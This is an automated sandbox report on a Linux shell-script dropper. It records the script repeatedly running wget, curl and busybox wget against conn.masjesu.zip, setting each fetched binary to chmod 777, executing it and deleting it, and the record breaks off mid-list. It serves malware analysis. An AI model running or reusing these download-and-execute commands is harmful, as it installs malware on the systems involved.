Malware Analysis Report

2025-05-06 03:39

Sample ID 241124-bcwfzawkaz
Target 03977dc333adcf1bd239088130c5146a.bin
SHA256 fb653889830a88ebdae99aea80dbb031e8627d42de7e64a95e0d164453f4ef95
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

fb653889830a88ebdae99aea80dbb031e8627d42de7e64a95e0d164453f4ef95

Threat Level: Shows suspicious behavior

The file 03977dc333adcf1bd239088130c5146a.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:00

Reported

2024-11-24 01:03

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:00

Reported

2024-11-24 01:03

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

33s

Command Line

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:00

Reported

2024-11-24 01:03

Platform

debian9-mipsbe-20240729-en

Max time kernel

134s

Max time network

136s

Command Line

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 N/A
N/A /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA N/A
N/A /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD N/A
N/A /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m N/A
N/A /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt N/A
N/A /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT N/A
N/A /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To N/A
N/A /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 N/A
N/A /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 N/A
N/A /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW N/A
N/A /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr N/A
N/A /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK N/A
N/A /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H N/A
N/A /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs N/A
N/A /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H N/A
N/A /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs N/A
N/A /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK N/A
N/A /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD N/A
N/A /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m N/A
N/A /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 N/A
N/A /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA N/A
N/A /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To N/A
N/A /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 N/A
N/A /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt N/A
N/A /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT N/A
N/A /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW N/A
N/A /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr N/A
N/A /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /usr/bin/curl N/A
File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /usr/bin/curl N/A
File opened for modification /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt /usr/bin/curl N/A
File opened for modification /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT /usr/bin/curl N/A
File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /usr/bin/curl N/A
File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /usr/bin/curl N/A
File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /usr/bin/curl N/A
File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /usr/bin/curl N/A
File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /usr/bin/curl N/A
File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /usr/bin/curl N/A
File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /usr/bin/curl N/A
File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /usr/bin/curl N/A
File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /usr/bin/curl N/A
File opened for modification /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H /usr/bin/curl N/A
File opened for modification /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs /usr/bin/curl N/A
File opened for modification /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK /usr/bin/curl N/A
File opened for modification /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 /usr/bin/curl N/A
File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /usr/bin/curl N/A
File opened for modification /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 /usr/bin/curl N/A
File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /usr/bin/curl N/A
File opened for modification /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr /usr/bin/curl N/A
File opened for modification /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To /usr/bin/curl N/A
File opened for modification /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW /usr/bin/curl N/A
File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /usr/bin/curl N/A
File opened for modification /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD /usr/bin/curl N/A
File opened for modification /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m /usr/bin/curl N/A
File opened for modification /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 /usr/bin/curl N/A
File opened for modification /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA /usr/bin/curl N/A

Processes

/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh

[/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/chmod

[chmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1

[./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/bin/rm

[rm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/chmod

[chmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA

[./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/bin/rm

[rm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/chmod

[chmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD

[./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/rm

[rm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/chmod

[chmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m

[./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/bin/rm

[rm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/chmod

[chmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt

[./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/bin/rm

[rm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/chmod

[chmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT

[./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/bin/rm

[rm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/chmod

[chmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To

[./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/bin/rm

[rm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/chmod

[chmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675

[./aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/bin/rm

[rm aihC944K8Q0TvCpjxSMtRX5smAOk3is675]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/chmod

[chmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0

[./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/bin/rm

[rm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/chmod

[chmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW

[./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/bin/rm

[rm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/chmod

[chmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr

[./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/bin/rm

[rm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/chmod

[chmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK

[./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/rm

[rm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/chmod

[chmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H

[./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/rm

[rm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/chmod

[chmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs

[./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/rm

[rm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/chmod

[chmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H

[./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/bin/rm

[rm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/chmod

[chmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs

[./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/bin/rm

[rm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/chmod

[chmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK

[./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/bin/rm

[rm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD]

/bin/chmod

